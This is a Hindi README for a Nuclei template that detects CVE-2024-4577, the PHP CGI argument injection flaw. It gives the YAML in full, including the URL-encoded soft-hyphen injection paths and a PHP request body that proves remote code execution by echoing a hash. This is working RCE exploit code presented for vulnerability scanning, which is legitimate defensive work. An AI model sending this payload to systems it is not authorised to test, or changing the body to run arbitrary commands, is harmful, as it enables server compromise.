
CVE-2024-4577 PHP CGI आर्गुमेंट इंजेक्शन भेद्यता का पता लगाने के लिए Nuclei टेम्पलेट, जो क्राफ्टेड HTTP अनुरोधों और प्रतिक्रिया मिलान के माध्यम से स्वचालित RCE परीक्षण सक्षम करता है।
इस रिपॉजिटरी में CVE-2024-4577 के रूप में पहचानी गई PHP CGI आर्गुमेंट इंजेक्शन भेद्यता का पता लगाने के लिए एक Nuclei टेम्पलेट है।
id: CVE-2024-4577
info:
name: CVE-2024-4577 PHP CGI Argument Injection
author: Hüseyin TINTAŞ
severity: critical
description: >
CVE-2024-4577 PHP CGI Argument Injection Vulnerability.
This template checks if the response contains "CVE_2024_4577_TEST" indicating a successful injection.
tags: cve,cve2024,php,cgi,rce,cve2024-4577
http:
- method: POST
path:
- "{{BaseURL}}/cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
- "{{BaseURL}}/php-cgi/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
- "{{BaseURL}}/cgi-bin/php.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
- "{{BaseURL}}/php-cgi/php.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
- "{{BaseURL}}/index.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
- "{{BaseURL}}/index.test?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
headers:
User-Agent: "curl/8.3.0"
Accept: "*/*"
Content-Type: "application/x-www-form-urlencoded"
Connection: "keep-alive"
body: |
<?php echo md5("CVE_2024_4577_TEST"); ?>
matchers:
- type: word
part: body
words:
- "83946a388fdf6cd2707eed8550575a76"
इस टेम्पलेट को Nuclei के साथ उपयोग करने के लिए, टेम्पलेट सामग्री को CVE-2024-4577.yaml नाम की फ़ाइल में सहेजें और निम्नलिखित कमांड चलाएँ:
nuclei -t CVE-2024-4577.yaml -u <target-url>
<target-url> को उस लक्ष्य के URL से बदलें जिसे आप स्कैन करना चाहते हैं।
किसी भी पूछताछ या अधिक जानकारी के लिए, आप मुझसे इस प्रकार संपर्क कर सकते हैं: